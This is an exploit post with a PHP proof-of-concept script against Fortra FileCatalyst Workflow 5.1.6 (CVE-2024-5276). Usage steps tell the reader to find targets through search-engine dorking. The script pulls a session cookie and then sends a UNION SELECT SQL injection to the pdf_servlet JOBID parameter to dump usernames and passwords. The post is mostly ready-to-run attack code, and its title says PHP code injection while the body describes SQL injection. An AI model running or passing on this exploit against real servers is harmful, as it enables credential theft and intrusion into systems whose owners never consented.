=============================================================================================================================================
| # Title     : Fortra FileCatalyst Workflow v5.1.6 Build 135 PHP Code Injection Vulnerability                                              |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
| # Vendor    : https://www.fortra.com/fr/lignes-de-produit/filecatalyst                                                                    |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Code Description:  The code extracts the JSESSIONID first and then uses it to perform SQL Injection. 
	
	( https://packetstorm.news/files/id/180866/ CVE-2024-5276)
	
[+] save code as poc.php.

[+] Set Target : line 48 + 120

[+] USage : php poc.php 

[+] PayLoad :

<?php

class SessionExtractor {
    private $target;
    private $userAgent;
    private $jsessionid;

    public function __construct($target) {
        $this->target = rtrim($target, '/');
        $this->userAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36";
    }

    private function sendRequest($url) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_HEADER, true);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_USERAGENT, $this->userAgent);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
        
        $response = curl_exec($ch);
        
        if (curl_errno($ch)) {
            die("cURL Error: " . curl_error($ch));
        }

        curl_close($ch);
        return $response;
    }

    public function getSessionId() {
        echo "[*] Attempt to extract JSESSIONID...\n";
        $response = $this->sendRequest("{$this->target}/workflow/");
        
        if (preg_match('/Set-Cookie:\s*JSESSIONID=([^;]+)/i', $response, $matches)) {
            $this->jsessionid = trim($matches[1]);
            file_put_contents("session.txt", $this->jsessionid);
            echo "[+] Extracted JSESSIONID: {$this->jsessionid}\n";
            return $this->jsessionid;
        } else {
            die("[-] JSESSIONID not found. Check the link.\n");
        }
    }
}

$extractor = new SessionExtractor('https://ADD_TARGET_HERE/');
$jsessionid = $extractor->getSessionId();

class Indoushka {
    private $target;
    private $userAgent;
    private $jsessionid = null;

    public function __construct($target) {
        $this->target = rtrim($target, '/');
        $this->userAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36";
    }

    private function sendRequest($url, $headers = []) {
        $ch = curl_init();
        curl_setopt_array($ch, [
            CURLOPT_URL => $url,
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_HEADER => true,
            CURLOPT_FOLLOWLOCATION => true,  // تتبع التحويلات
            CURLOPT_SSL_VERIFYHOST => false,
            CURLOPT_SSL_VERIFYPEER => false,
            CURLOPT_USERAGENT => $this->userAgent,
            CURLOPT_HTTPHEADER => $headers
        ]);

        $response = curl_exec($ch);
        if (curl_errno($ch)) {
            die("CURL Error: " . curl_error($ch));
        }
        curl_close($ch);

        return $response;
    }

    public function getSessionId() {
        if ($this->jsessionid) {
            echo "[*] JSESSIONID already extracted: {$this->jsessionid}\n";
            return;
        }

        echo "[*] Attempting to extract JSESSIONID...\n";
        $response = $this->sendRequest("{$this->target}/workflow/");

        if (preg_match('/Set-Cookie:\s*JSESSIONID=([^;]+)/i', $response, $matches)) {
            $this->jsessionid = trim($matches[1]);
            echo "[+] JSESSIONID extracted: {$this->jsessionid}\n";
        } else {
            die("[-] JSESSIONID not found. Check the link.\n");
        }
    }

    public function injectSQL($payload) {
        if (!$this->jsessionid) {
            die("[-] No session ID found. Run getSessionId() first.\n");
        }

        echo "[*] Sending SQL Injection payload...\n";
        
        $url = "{$this->target}/workflow/pdf_servlet?JOBID=" . urlencode($payload);
        $headers = ["Cookie: JSESSIONID={$this->jsessionid}"];
        $response = $this->sendRequest($url, $headers);

             if (strpos($response, "Success") !== false || strpos($response, "Admin") !== false) {
            echo "[+] SQL Injection executed successfully!\n";
        } else {
            echo "[-] SQL Injection failed. Check input validity.\n";
        }
    }
}

// تشغيل الكود
$injector = new Indoushka('https://ADD_TARGET_HERE/');
$injector->getSessionId();

// حمولة مخصصة
$payload = "' UNION SELECT username, password FROM users --";

$injector->injectSQL($payload);
?>




Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================